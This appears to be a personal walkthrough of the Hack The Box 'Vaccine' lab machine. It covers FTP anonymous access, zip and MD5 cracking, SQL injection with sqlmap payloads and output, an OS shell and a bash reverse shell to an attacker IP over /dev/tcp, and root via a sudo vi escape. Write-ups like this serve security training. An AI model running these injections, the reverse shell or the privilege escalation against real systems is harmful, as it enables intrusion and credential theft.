HTB-Vaccine

vaccine htb machine

Nmap Enumeration

nmap -sC -sV -vv -oA 1 10.129.76.24
cat 1.nmap

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.10
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzC28uKxt9pqJ4fLYmq/X5t7p44L+bUFQIDeEab29kDPnKdFOa9ijB5C5APVxLaAXVYSXATPYUqjIEWU98Vvvol1zuc82+KG9KfX94pD8TaPY2MZnoi9TfSxgwmKpmiRWR4DwwMS+mNo+WBU3sjB2QjgNip2vbiHxMitKeIfDLLFYiLKhc1eBRtooZ6DJzXQOMFp5QhSbZygWqebpFcsrmFnz9QWhx4MekbUnUVPKwCunycLi1pjrsmOAekbGz3/5R3H5tFSck915iqyc8bSkBZgRwW3FDJAXFmFgHG9fX727HsXFk8MXmVRMuH1LxGjvn1q3j27bb22QzprS7t9bJciWfwgt1sl57S0Q+iFbku83NgAFxUG373nspOHn08DwMllCyeLOG3Oy3x9zcCxMGATopiPckt8lb1GCWIvLPSNHMW12OyCKGM+AmLu4q9z7zX1YOUM6oxfn3qZVLKSZJ/DJu+aifv2BVNu/zJU2wdk1vFxysmQ4roj5O5I+H9x0=
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNsSORVFGkIbgItDm/mxmyPhpsIJihXV8y4CQiMTWGdEVQatXNIlXX0yGLZ4JFtPEX9rOGAp/eLZc0mGJtDyuyQ=
|   256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvk132UscLPAfaZyZ2Av54rpw9cP31OrloBE9v3SLW
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: MegaCorp Login
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.

port 21 , 22 and 80 (http) open so as you can see deeply through this enum result , ftp login is anonymous allowed

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip

just done , i reached the ftp for anonymous login and got acess ;)

ftp 10.129.76.24
Connected to 10.129.76.24.
220 (vsFTPd 3.0.3)
Name (10.129.76.24:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10516|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10802|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |****************************************************************************************|  2533        7.13 KiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:01 (2.30 KiB/s)
ftp> bye
221 Goodbye.

2> cracking the zip

as we got the backup.zip i got a prompt for password and then i thought to go for the john the ripper ;) bro code!!

unzip backup.zip 
Archive:  backup.zip
[backup.zip] index.php password: 
   skipping: index.php               incorrect password
   skipping: style.css               incorrect password

zip2john backup.zip > backup.hash
Created directory: /root/.john
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

john backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
741852963        (backup.zip)     
1g 0:00:00:00 DONE 2/3 (2025-07-08 08:51) 10.00g/s 850170p/s 850170c/s 850170C/s 123456..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

i got the pass i.e 741852963

┌──(root㉿kali)-[/home/kali/hackthebox/vaccine]
└─# unzip -P 741852963 backup.zip                                                                                                    
Archive:  backup.zip
  inflating: index.php               
  inflating: style.css               

┌──(root㉿kali)-[/home/kali/hackthebox/vaccine]
└─# ls                                                                                                                               
1.gnmap  1.nmap  1.xml  backup.hash  backup.zip  index.php  style.css

after this i doned cat index.php

and we got some intresting info there !!

┌──(root㉿kali)-[/home/kali/hackthebox/vaccine]
└─# cat index.php
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }

i.e username = admin and pass is md5 hash 2cb42f8734ea607eefed3b70af13bbd3

to crack md5 i used crackstation

i got password qwerty789

and got redirected to dashboard.php and after that there was a search bar

and i tried to just put some payload like search=hi’SLEEP(5)

this was just a lzy try here !!

idk but i saw this and gone to the sqlmap and it was sucessfull !!

sqlmap -r re.txt --batch --dbs --level=5 --risk=3                                                                                
        ___
       __H__                                                                                                                         
 ___ ___[(]_____ ___ ___  {1.9.2#stable}                                                                                             
|_ -| . [']     | .'| . |                                                                                                            
|___|_  [)]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:46 /2025-07-08/

[09:26:46] [INFO] parsing HTTP request from 're.txt'
[09:26:46] [INFO] testing connection to the target URL
[09:26:48] [INFO] testing if the target URL content is stable
[09:26:49] [INFO] target URL content is stable
[09:26:49] [INFO] testing if GET parameter 'search' is dynamic
[09:26:50] [WARNING] GET parameter 'search' does not appear to be dynamic
[09:26:50] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[09:26:51] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:51] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[09:26:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:28:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:28:31] [INFO] GET parameter 'search' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")
[09:28:31] [INFO] testing 'Generic inline queries'
[09:28:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:28:33] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[09:28:33] [INFO] testing 'PostgreSQL inline queries'
[09:28:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:28:47] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[09:28:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:29:00] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[09:29:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:29:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:29:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:29:03] [WARNING] reflective value(s) found and filtering out
[09:29:06] [INFO] target URL appears to have 5 columns in query
[09:29:10] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[09:29:10] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: search=-5596' OR 2448=2448-- SrHG

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=hey' AND 4333=CAST((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)) AS NUMERIC)-- MFCV

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=hey';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=hey' AND 2575=(SELECT 2575 FROM PG_SLEEP(5))-- jPGh

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=hey' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113))||(CHR(114)||CHR(78)||CHR(88)||CHR(72)||CHR(70)||CHR(116)||CHR(121)||CHR(107)||CHR(116)||CHR(68)||CHR(103)||CHR(87)||CHR(74)||CHR(99)||CHR(97)||CHR(105)||CHR(74)||CHR(83)||CHR(107)||CHR(82)||CHR(110)||CHR(119)||CHR(102)||CHR(82)||CHR(110)||CHR(101)||CHR(97)||CHR(88)||CHR(102)||CHR(74)||CHR(114)||CHR(88)||CHR(108)||CHR(116)||CHR(109)||CHR(78)||CHR(81)||CHR(84)||CHR(73)||CHR(120))||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)),NULL,NULL,NULL-- RqzQ
---
[09:29:11] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[09:29:18] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[09:29:18] [INFO] fetching database (schema) names
[09:29:20] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:29:23] [WARNING] the SQL query provided does not return any output
[09:29:26] [INFO] retrieved: 'public'
[09:29:26] [INFO] retrieved: 'pg_catalog'
[09:29:27] [INFO] retrieved: 'information_schema'
[09:30:01] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[09:30:01] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

[09:31:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.129.76.24'

[*] ending @ 09:31:19 /2025-07-08/

so this is what i had done to get to dump the available databases and trust me here the reall game begains for me !!

i went into the public but got nothign but cars so i was like what can i do here , then i thought of seraching the email adress or lik eusername and password in the databases !!

sqlmap -r re.txt --search -C password,user,email,login --batch

this was my cmd and i got intresting things !! like rol_user and password

[09:37:30] [WARNING] no databases have tables containing columns LIKE 'email'
[09:37:30] [INFO] searching columns LIKE 'login' across all databases
[09:37:31] [INFO] fetching columns LIKE 'login' for table 'pg_authid' in database 'pg_catalog'
[09:37:32] [INFO] fetching columns LIKE 'login' for table 'pg_roles' in database 'pg_catalog'
columns LIKE 'password' were found in the following databases:
Database: pg_catalog
Table: pg_authid
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| rolpassword | text |
+-------------+------+

Database: pg_catalog
Table: pg_roles
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| rolpassword | text |
+-------------+------+

columns LIKE 'login' were found in the following databases:
Database: pg_catalog
Table: pg_authid
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| rolcanlogin | bool |
+-------------+------+

Database: pg_catalog
Table: pg_roles
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| rolcanlogin | bool |
+-------------+------+

do you want to dump found column(s) entries? [Y/n] Y
which database(s)?
[a]ll (default)
[pg_catalog]
[information_schema]
[q]uit
> a
which table(s) of database 'pg_catalog'?
[a]ll (default)
[pg_authid]
[pg_roles]
[pg_user_mapping_user_server_index]
[pg_shadow]
[pg_hba_file_rules]
[pg_user_mapping]
[pg_user]
[pg_available_extension_versions]
[pg_user_mappings]
[s]kip
[q]uit
> a
[09:37:33] [INFO] fetching entries of column(s) 'rolcanlogin,rolpassword' for table 'pg_authid' in database 'pg_catalog'
[09:37:34] [INFO] recognized possible password hashes in column 'rolpassword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:37:34] [INFO] using hash method 'postgres_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:37:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:37:34] [INFO] starting dictionary-based cracking (postgres_passwd)
[09:37:34] [INFO] starting 8 processes 
[09:37:40] [WARNING] no clear password(s) found                                                                                     
Database: pg_catalog
Table: pg_authid
[9 entries]
+-------------------------------------+-------------+
| rolpassword                         | rolcanlogin |
+-------------------------------------+-------------+
| NULL                                | false       |
| NULL                                | false       |
| NULL                                | false       |
| NULL                                | false       |
| NULL                                | false       |
| NULL                                | false       |
| NULL                                | false       |
| NULL                                | false       |
| md52d58e0637ec1e94cdfba3d1c26b67d01 | true        |
+-------------------------------------+-------------+

[09:37:40] [INFO] table 'pg_catalog.pg_authid' dumped to CSV file '/root/.local/share/sqlmap/output/10.129.76.24/dump/pg_catalog/pg_authid.csv'                                                                                                                           
[09:37:40] [INFO] fetching entries of column(s) 'rolcanlogin,rolpassword' for table 'pg_roles' in database 'pg_catalog'
Database: pg_catalog
Table: pg_roles
[9 entries]
+-------------+-------------+
| rolpassword | rolcanlogin |
+-------------+-------------+
| ********    | false       |
| ********    | false       |
| ********    | false       |
| ********    | false       |
| ********    | false       |
| ********    | false       |
| ********    | false       |
| ********    | false       |
| ********    | true        |
+-------------+-------------+

[09:37:41] [INFO] table 'pg_catalog.pg_roles' dumped to CSV file '/root/.local/share/sqlmap/output/10.129.76.24/dump/pg_catalog/pg_roles.csv'                                                                                                                             
[09:37:41] [INFO] fetching entries of column(s) 'umuser' for table 'pg_user_mapping_user_server_index' in database 'pg_catalog'
[09:37:47] [WARNING] the SQL query provided does not return any output
[09:37:47] [WARNING] the SQL query provided does not return any output
[09:37:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:37:47] [INFO] fetching number of column(s) 'umuser' entries for table 'pg_user_mapping_user_server_index' in database 'pg_catalog'
[09:37:47] [INFO] retrieved: 
[09:37:50] [INFO] retrieved: 
[09:37:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[09:37:53] [WARNING] unable to retrieve the number of column(s) 'umuser' entries for table 'pg_user_mapping_user_server_index' in database 'pg_catalog'
[09:37:53] [INFO] fetching entries of column(s) 'userepl' for table 'pg_shadow' in database 'pg_catalog'
Database: pg_catalog
Table: pg_shadow
[1 entry]
+---------+
| userepl |
+---------+
| true    |
+---------+

[09:37:55] [INFO] table 'pg_catalog.pg_shadow' dumped to CSV file '/root/.local/share/sqlmap/output/10.129.76.24/dump/pg_catalog/pg_shadow.csv'                                                                                                                           
[09:37:55] [INFO] fetching entries of column(s) 'user_name' for table 'pg_hba_file_rules' in database 'pg_catalog'
Database: pg_catalog
Table: pg_hba_file_rules
[7 entries]
+------------+
| user_name  |
+------------+
| {postgres} |
| {all}      |
| {all}      |
| {all}      |
| {all}      |
| {all}      |
| {all}      |
+------------+

[09:37:57] [INFO] table 'pg_catalog.pg_hba_file_rules' dumped to CSV file '/root/.local/share/sqlmap/output/10.129.76.24/dump/pg_catalog/pg_hba_file_rules.csv'                                                                                                           
[09:37:57] [INFO] fetching entries of column(s) 'umuser' for table 'pg_user_mapping' in database 'pg_catalog'
[09:38:03] [INFO] fetching number of column(s) 'umuser' entries for table 'pg_user_mapping' in database 'pg_catalog'
[09:38:03] [INFO] retrieved: 0
[09:38:10] [WARNING] table 'pg_user_mapping' in database 'pg_catalog' appears to be empty
Database: pg_catalog
Table: pg_user_mapping
[0 entries]
+--------+
| umuser |
+--------+
+--------+

this was pretty intresting for me but i got nothing like idont have a username atleast !!

so there is a usernmae we can say or something that we can do innto this i got this info by

┌──(root㉿kali)-[/home/kali/hackthebox/vaccine]
└─# sqlmap -r re.txt -D pg_catalog -T pg_roles -C rolname,rolpassword --dump --batch                                                
        ___
       __H__                                                                                                                         
 ___ ___[(]_____ ___ ___  {1.9.2#stable}                                                                                             
|_ -| . ["]     | .'| . |                                                                                                            
|___|_  ["]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:41:38 /2025-07-08/

[09:41:38] [INFO] parsing HTTP request from 're.txt'
[09:41:38] [INFO] resuming back-end DBMS 'postgresql' 
[09:41:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: search=-5596' OR 2448=2448-- SrHG

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=hey' AND 4333=CAST((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)) AS NUMERIC)-- MFCV

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=hey';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=hey' AND 2575=(SELECT 2575 FROM PG_SLEEP(5))-- jPGh

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=hey' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113))||(CHR(114)||CHR(78)||CHR(88)||CHR(72)||CHR(70)||CHR(116)||CHR(121)||CHR(107)||CHR(116)||CHR(68)||CHR(103)||CHR(87)||CHR(74)||CHR(99)||CHR(97)||CHR(105)||CHR(74)||CHR(83)||CHR(107)||CHR(82)||CHR(110)||CHR(119)||CHR(102)||CHR(82)||CHR(110)||CHR(101)||CHR(97)||CHR(88)||CHR(102)||CHR(74)||CHR(114)||CHR(88)||CHR(108)||CHR(116)||CHR(109)||CHR(78)||CHR(81)||CHR(84)||CHR(73)||CHR(120))||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)),NULL,NULL,NULL-- RqzQ
---
[09:41:40] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[09:41:40] [INFO] fetching entries of column(s) 'rolname,rolpassword' for table 'pg_roles' in database 'pg_catalog'
Database: pg_catalog
Table: pg_roles
[9 entries]
+---------------------------+-------------+
| rolname                   | rolpassword |
+---------------------------+-------------+
| pg_monitor                | ********    |
| pg_read_all_settings      | ********    |
| pg_read_all_stats         | ********    |
| pg_stat_scan_tables       | ********    |
| pg_read_server_files      | ********    |
| pg_write_server_files     | ********    |
| pg_execute_server_program | ********    |
| pg_signal_backend         | ********    |
| postgres                  | ********    |
+---------------------------+-------------+

[09:41:41] [INFO] table 'pg_catalog.pg_roles' dumped to CSV file '/root/.local/share/sqlmap/output/10.129.76.24/dump/pg_catalog/pg_roles.csv'                                                                                                                             
[09:41:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.129.76.24'

[*] ending @ 09:41:41 /2025-07-08/

sqlmap -r req.txt --current-user

i checked using this cmd and i got postgres as the current user then i rushed for the steps we have to do if we get the data dump or like acess into sql databases

--os-shell
--file-read=/etc/passwd
--dbs
--current-user
--current-db

i started with

- os-shell , before that we have to capture the req in burp and copy the req and paste it in new file called req.txt or any you want !!

at first i got nothing but error due to phpsession id , then i again cpied it correctly and boom i got shell ;)

┌──(root㉿kali)-[/home/kali/hackthebox/vaccine]
└─# sqlmap -r re.txt --os-shell
        ___
       __H__                                                                                                                         
 ___ ___["]_____ ___ ___  {1.9.2#stable}                                                                                             
|_ -| . [(]     | .'| . |                                                                                                            
|___|_  [.]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:13:21 /2025-07-08/

[10:13:21] [INFO] parsing HTTP request from 're.txt'
[10:13:21] [INFO] resuming back-end DBMS 'postgresql' 
[10:13:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: search=-5596' OR 2448=2448-- SrHG

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=hey' AND 4333=CAST((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)) AS NUMERIC)-- MFCV

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=hey';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=hey' AND 2575=(SELECT 2575 FROM PG_SLEEP(5))-- jPGh

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=hey' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113))||(CHR(114)||CHR(78)||CHR(88)||CHR(72)||CHR(70)||CHR(116)||CHR(121)||CHR(107)||CHR(116)||CHR(68)||CHR(103)||CHR(87)||CHR(74)||CHR(99)||CHR(97)||CHR(105)||CHR(74)||CHR(83)||CHR(107)||CHR(82)||CHR(110)||CHR(119)||CHR(102)||CHR(82)||CHR(110)||CHR(101)||CHR(97)||CHR(88)||CHR(102)||CHR(74)||CHR(114)||CHR(88)||CHR(108)||CHR(116)||CHR(109)||CHR(78)||CHR(81)||CHR(84)||CHR(73)||CHR(120))||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)),NULL,NULL,NULL-- RqzQ
---
[10:13:23] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[10:13:23] [INFO] fingerprinting the back-end DBMS operating system
[10:13:27] [INFO] the back-end DBMS operating system is Linux
[10:13:29] [INFO] testing if current user is DBA
[10:13:33] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[10:13:33] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
base
global
pg_commit_ts
pg_dynshmem
pg_logical
pg_multixact
pg_notify
pg_replslot
pg_serial
pg_snapshots
pg_stat
pg_stat_tmp
pg_subtrans
pg_tblspc
pg_twophase
PG_VERSION
pg_wal
pg_xact
postgresql.auto.conf
postmaster.opts
postmaster.pid
---
os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.10/4444 0>&1"
do you want to retrieve the command standard output? [Y/n/a] Y
[10:15:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[10:17:29] [CRITICAL] connection timed out to the target URL

[*] ending @ 10:17:29 /2025-07-08/

see above as i got shell i done ls and tried to think as much as i can , after a eternity i got some intresting thought to put a revershe shell i startied putting

bash -c "bash -i >& /dev/tcp/10.10.16.10/4444 0>&1"

and started a listner on nc -lvnp 4444

┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 4444                                                                                                                    
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.76.24] 44170
bash: cannot set terminal process group (6025): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$

from here you just have to put the command to find the user.txt , adn you will get it on

/var/lib/postgresql/user.txt

3> privilage esclation

for priv esc i tried to get password txt find by many commands and i got by grep command , but you have to be into the particular directory like i moved to /var/www/html

┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 4444                                                                                                                    
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.76.24] 44170
bash: cannot set terminal process group (6025): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls -la
ls -la
total 392
drwxr-xr-x 2 root root   4096 Jul 23  2021 .
drwxr-xr-x 3 root root   4096 Jul 23  2021 ..
-rw-rw-r-- 1 root root 362847 Feb  3  2020 bg.png
-rw-r--r-- 1 root root   4723 Feb  3  2020 dashboard.css
-rw-r--r-- 1 root root     50 Jan 30  2020 dashboard.js
-rw-r--r-- 1 root root   2313 Feb  4  2020 dashboard.php
-rw-r--r-- 1 root root   2594 Feb  3  2020 index.php
-rw-r--r-- 1 root root   1100 Jan 30  2020 license.txt
-rw-r--r-- 1 root root   3274 Feb  3  2020 style.css
postgres@vaccine:/var/www/html$ cat dashboard.php | grep pass
cat dashboard.php | grep pass
          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
postgres@vaccine:/var/www/html$ exit

postgres@vaccine:/var/www/html$ cat dashboard.php | grep pass
cat dashboard.php | grep pass
          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
postgres@vaccine:/var/www/html$ exit

we got dbname=carsdb user=postgres password=P@s5w0rd!”

instantly i gone for ssh login and i got loggedin

┌──(root㉿kali)-[/home/kali]
└─# ssh postgres@10.129.76.24
The authenticity of host '10.129.76.24 (10.129.76.24)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
Warning: Permanently added '10.129.76.24' (ED25519) to the list of known hosts.
postgres@10.129.76.24's password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 08 Jul 2025 05:57:47 AM UTC

  System load:  0.0               Processes:             194
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 24%               IP address for ens160: 10.129.76.24
  Swap usage:   0%

0 updates can be installed immediately.
0 of these updates are security updates.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

postgres@vaccine:~$ sudo -l
[sudo] password for postgres: 
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

the first thing i done is sudo -l and i got something intresting like i can only use vim , as the path you can see

so this was the stuff i was trying to do , like setting upp reverse shell thorugh making a tmp/shell.sh

see i kept it simple as i can

i opened it and then i pressed ESC and typed

:set shell=/bin/sh

after this you will be stilll on the vim ad just type the following , so this was according to the gtfobins :shell

type :shell and you will get the root shell !!!!

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
